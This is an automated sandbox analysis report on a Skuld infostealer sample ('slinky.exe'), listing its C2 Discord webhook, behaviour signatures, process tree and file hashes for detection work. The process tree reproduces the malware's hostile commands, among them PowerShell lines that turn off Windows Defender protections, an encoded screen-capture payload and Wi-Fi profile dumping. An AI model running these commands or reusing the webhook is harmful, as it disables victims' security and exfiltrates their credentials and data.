Analysis

  • max time kernel
    98s
  • max time network
    97s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
  • submitted
    08-08-2024 14:55

General

Malware Config

Extracted

Family

skuld

C2

https://ptb.discord.com/api/webhooks/1267444280629133384/93lgPC5prxwm7kfEOYzZT9pM4aGa5M70dJhLbOvmKWx-H6EKIXoR_k1Z9HoM8VPO8jTA

Signatures

  • Skuld stealer

    An info stealer written in Go lang.

  • Credentials from Password Stores: Credentials from Web Browsers 1 TTPs

    Malicious Access or copy of Web Browser Credential store.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Drops file in Drivers directory 3 IoCs
  • Executes dropped EXE 1 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Unsecured Credentials: Credentials In Files 1 TTPs

    Steal credentials from unsecured files.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Looks up external IP address via web service 3 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Maps connected drives based on registry 3 TTPs 2 IoCs

    Disk information is often read in order to detect sandboxing environments.

  • Obfuscated Files or Information: Command Obfuscation 1 TTPs

    Adversaries may obfuscate content during command execution to impede detection.

  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 1 IoCs

    Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

  • Detects videocard installed 1 TTPs 2 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • GoLang User-Agent 1 IoCs

    Uses default user-agent string defined by GoLang HTTP packages.

  • Modifies registry class 1 IoCs
  • Modifies system certificate store 2 TTPs 5 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 13 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 35 IoCs
  • Suspicious use of SendNotifyMessage 24 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Views/modifies file attributes 1 TTPs 4 IoCs

Processes

  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://youtube.com
    1⤵
    • Enumerates system info in registry
    • Modifies registry class
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    PID:3780
    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffa579246f8,0x7ffa57924708,0x7ffa57924718
      2⤵
        PID:1256
      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2024,5365840182909911623,11709372031132929779,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2072 /prefetch:2
        2⤵
          PID:5052
        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2024,5365840182909911623,11709372031132929779,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2184 /prefetch:3
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          PID:4872
        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2024,5365840182909911623,11709372031132929779,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2884 /prefetch:8
          2⤵
            PID:4612
          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2024,5365840182909911623,11709372031132929779,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3216 /prefetch:1
            2⤵
              PID:5032
            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2024,5365840182909911623,11709372031132929779,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3224 /prefetch:1
              2⤵
                PID:988
              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2024,5365840182909911623,11709372031132929779,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4860 /prefetch:1
                2⤵
                  PID:3508
                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2024,5365840182909911623,11709372031132929779,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5072 /prefetch:1
                  2⤵
                    PID:3988
                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2024,5365840182909911623,11709372031132929779,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=4652 /prefetch:8
                    2⤵
                      PID:4764
                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2024,5365840182909911623,11709372031132929779,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5284 /prefetch:8
                      2⤵
                        PID:2696
                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2024,5365840182909911623,11709372031132929779,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4884 /prefetch:1
                        2⤵
                          PID:1560
                        • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                          "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2024,5365840182909911623,11709372031132929779,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5932 /prefetch:8
                          2⤵
                            PID:2264
                          • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                            "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2024,5365840182909911623,11709372031132929779,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5932 /prefetch:8
                            2⤵
                            • Suspicious behavior: EnumeratesProcesses
                            PID:5076
                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2024,5365840182909911623,11709372031132929779,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5608 /prefetch:1
                            2⤵
                              PID:4028
                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2024,5365840182909911623,11709372031132929779,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5388 /prefetch:1
                              2⤵
                                PID:2960
                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2024,5365840182909911623,11709372031132929779,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4124 /prefetch:1
                                2⤵
                                  PID:628
                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2024,5365840182909911623,11709372031132929779,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6088 /prefetch:1
                                  2⤵
                                    PID:2752
                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2024,5365840182909911623,11709372031132929779,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6072 /prefetch:1
                                    2⤵
                                      PID:2160
                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2024,5365840182909911623,11709372031132929779,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6056 /prefetch:1
                                      2⤵
                                        PID:3728
                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2024,5365840182909911623,11709372031132929779,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6080 /prefetch:1
                                        2⤵
                                          PID:4476
                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2024,5365840182909911623,11709372031132929779,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5192 /prefetch:8
                                          2⤵
                                            PID:3824
                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2024,5365840182909911623,11709372031132929779,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6496 /prefetch:1
                                            2⤵
                                              PID:988
                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2024,5365840182909911623,11709372031132929779,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6612 /prefetch:8
                                              2⤵
                                              • Suspicious behavior: EnumeratesProcesses
                                              PID:1020
                                          • C:\Windows\System32\CompPkgSrv.exe
                                            C:\Windows\System32\CompPkgSrv.exe -Embedding
                                            1⤵
                                              PID:2476
                                            • C:\Windows\System32\CompPkgSrv.exe
                                              C:\Windows\System32\CompPkgSrv.exe -Embedding
                                              1⤵
                                                PID:2120
                                              • C:\Windows\system32\AUDIODG.EXE
                                                C:\Windows\system32\AUDIODG.EXE 0x49c 0x420
                                                1⤵
                                                • Suspicious use of AdjustPrivilegeToken
                                                PID:3652
                                              • C:\Windows\System32\CompPkgSrv.exe
                                                C:\Windows\System32\CompPkgSrv.exe -Embedding
                                                1⤵
                                                  PID:392
                                                • C:\Windows\System32\rundll32.exe
                                                  C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                                                  1⤵
                                                    PID:1444
                                                  • C:\Program Files\7-Zip\7zG.exe
                                                    "C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\slinky\" -spe -an -ai#7zMap7897:74:7zEvent31753
                                                    1⤵
                                                    • Suspicious use of AdjustPrivilegeToken
                                                    • Suspicious use of FindShellTrayWindow
                                                    PID:4844
                                                  • C:\Users\Admin\Desktop\slinky\slinky.exe
                                                    "C:\Users\Admin\Desktop\slinky\slinky.exe"
                                                    1⤵
                                                    • Drops file in Drivers directory
                                                    • Executes dropped EXE
                                                    • Adds Run key to start application
                                                    • Maps connected drives based on registry
                                                    • Modifies system certificate store
                                                    • Suspicious behavior: EnumeratesProcesses
                                                    • Suspicious use of AdjustPrivilegeToken
                                                    PID:4920
                                                    • C:\Windows\system32\attrib.exe
                                                      attrib +h +s C:\Users\Admin\Desktop\slinky\slinky.exe
                                                      2⤵
                                                      • Views/modifies file attributes
                                                      PID:1096
                                                    • C:\Windows\system32\attrib.exe
                                                      attrib +h +s C:\Users\Admin\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe
                                                      2⤵
                                                      • Views/modifies file attributes
                                                      PID:4752
                                                    • C:\Windows\System32\Wbem\wmic.exe
                                                      wmic csproduct get UUID
                                                      2⤵
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:3048
                                                    • C:\Windows\System32\Wbem\wmic.exe
                                                      wmic path win32_VideoController get name
                                                      2⤵
                                                      • Detects videocard installed
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:3608
                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      powershell -Command Add-MpPreference -ExclusionPath C:\Users\Admin\Desktop\slinky\slinky.exe
                                                      2⤵
                                                      • Command and Scripting Interpreter: PowerShell
                                                      • Suspicious behavior: EnumeratesProcesses
                                                      PID:3076
                                                    • C:\Windows\System32\Wbem\wmic.exe
                                                      wmic os get Caption
                                                      2⤵
                                                        PID:2220
                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                                                        2⤵
                                                        • Command and Scripting Interpreter: PowerShell
                                                        • Suspicious behavior: EnumeratesProcesses
                                                        PID:3068
                                                      • C:\Windows\System32\Wbem\wmic.exe
                                                        wmic cpu get Name
                                                        2⤵
                                                          PID:3284
                                                        • C:\Windows\System32\Wbem\wmic.exe
                                                          wmic path win32_VideoController get name
                                                          2⤵
                                                          • Detects videocard installed
                                                          PID:312
                                                        • C:\Windows\System32\Wbem\wmic.exe
                                                          wmic csproduct get UUID
                                                          2⤵
                                                            PID:4564
                                                          • C:\Windows\system32\attrib.exe
                                                            attrib -r C:\Windows\System32\drivers\etc\hosts
                                                            2⤵
                                                            • Drops file in Drivers directory
                                                            • Views/modifies file attributes
                                                            PID:1184
                                                          • C:\Windows\system32\attrib.exe
                                                            attrib +r C:\Windows\System32\drivers\etc\hosts
                                                            2⤵
                                                            • Drops file in Drivers directory
                                                            • Views/modifies file attributes
                                                            PID:2292
                                                          • C:\Windows\system32\netsh.exe
                                                            netsh wlan show profiles
                                                            2⤵
                                                            • Event Triggered Execution: Netsh Helper DLL
                                                            • System Network Configuration Discovery: Wi-Fi Discovery
                                                            PID:2856
                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
                                                            2⤵
                                                              PID:4000
                                                              • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\u2ylqpnw\u2ylqpnw.cmdline"
                                                                3⤵
                                                                  PID:4112
                                                                  • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                    C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESCE28.tmp" "c:\Users\Admin\AppData\Local\Temp\u2ylqpnw\CSC291A098498AB4C38BE9CF2141E525A96.TMP"
                                                                    4⤵
                                                                      PID:3168

                                                              Network

                                                              MITRE ATT&CK Enterprise v15

                                                              Replay Monitor

                                                              Loading Replay Monitor...

                                                              Downloads

                                                              • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                                                                Filesize

                                                                2KB

                                                                MD5

                                                                d85ba6ff808d9e5444a4b369f5bc2730

                                                                SHA1

                                                                31aa9d96590fff6981b315e0b391b575e4c0804a

                                                                SHA256

                                                                84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

                                                                SHA512

                                                                8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                                Filesize

                                                                152B

                                                                MD5

                                                                ff63763eedb406987ced076e36ec9acf

                                                                SHA1

                                                                16365aa97cd1a115412f8ae436d5d4e9be5f7b5d

                                                                SHA256

                                                                8f460e8b7a67f0c65b7248961a7c71146c9e7a19772b193972b486dbf05b8e4c

                                                                SHA512

                                                                ce90336169c8b2de249d4faea2519bf7c3df48ae9d77cdf471dd5dbd8e8542d47d9348080a098074aa63c255890850ee3b80ddb8eef8384919fdca3bb9371d9f

                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                                Filesize

                                                                152B

                                                                MD5

                                                                2783c40400a8912a79cfd383da731086

                                                                SHA1

                                                                001a131fe399c30973089e18358818090ca81789

                                                                SHA256

                                                                331fa67da5f67bbb42794c3aeab8f7819f35347460ffb352ccc914e0373a22c5

                                                                SHA512

                                                                b7c7d3aa966ad39a86aae02479649d74dcbf29d9cb3a7ff8b9b2354ea60704da55f5c0df803fd0a7191170a8e72fdd5eacfa1a739d7a74e390a7b74bdced1685

                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000002

                                                                Filesize

                                                                229KB

                                                                MD5

                                                                604bc4b7139855b4236fc0ca70c48133

                                                                SHA1

                                                                66f0949d270b5f5247b3ed557e9ab8f43f07f97e

                                                                SHA256

                                                                251f4f7fc93c1550519a0b683ffdcff4f2e1245fe325e1c5a424186efe7718ae

                                                                SHA512

                                                                896714698a2e53798435c6f49b0bfe89f07d46812e59825a096513926ce5b7a5588f359cc84f113d6d8a18612c32e6fa0b8e314c3dbffb4cd66e62abc7f6f987

                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000004

                                                                Filesize

                                                                93KB

                                                                MD5

                                                                b6ea4f2f74fc639a669159f113a2e691

                                                                SHA1

                                                                8c2e28c1e985f9792881f8160f5667be828462bb

                                                                SHA256

                                                                30eb111b479561afca12779ce2937481ba880e39c1c24b817e2438f6a0427e94

                                                                SHA512

                                                                e686d58c68979ae61df3ae0cc79f64e0b8aba002e97199f5b924ae28d4f4dfa2f392258babd838fa20eed3607d743aca22cf3fa1281b7eee3526ac7c84ee73ed

                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000009

                                                                Filesize

                                                                47KB

                                                                MD5

                                                                fd1f79856510e1cddd8141f1d82aff4f

                                                                SHA1

                                                                659aa5c13b63adfb1480856cf8da6acd4fa624f4

                                                                SHA256

                                                                d2c922c16632143318a2792e0ea9345ea5c072ad583a84d8ef164cf952fec4f4

                                                                SHA512

                                                                7781c5280010519da7e71a849a9cb5e37f7b29a1e800bbf9cc47536eaa937abeecd1a2d61867c2744b7de83f0cfdc88b72255ee083501df0455fd018b0f86376

                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00000a

                                                                Filesize

                                                                20KB

                                                                MD5

                                                                80f1c7472825e6dd19d7ab65b0984ffb

                                                                SHA1

                                                                76af1427993a5d699b8441a32d751777a91fb0ef

                                                                SHA256

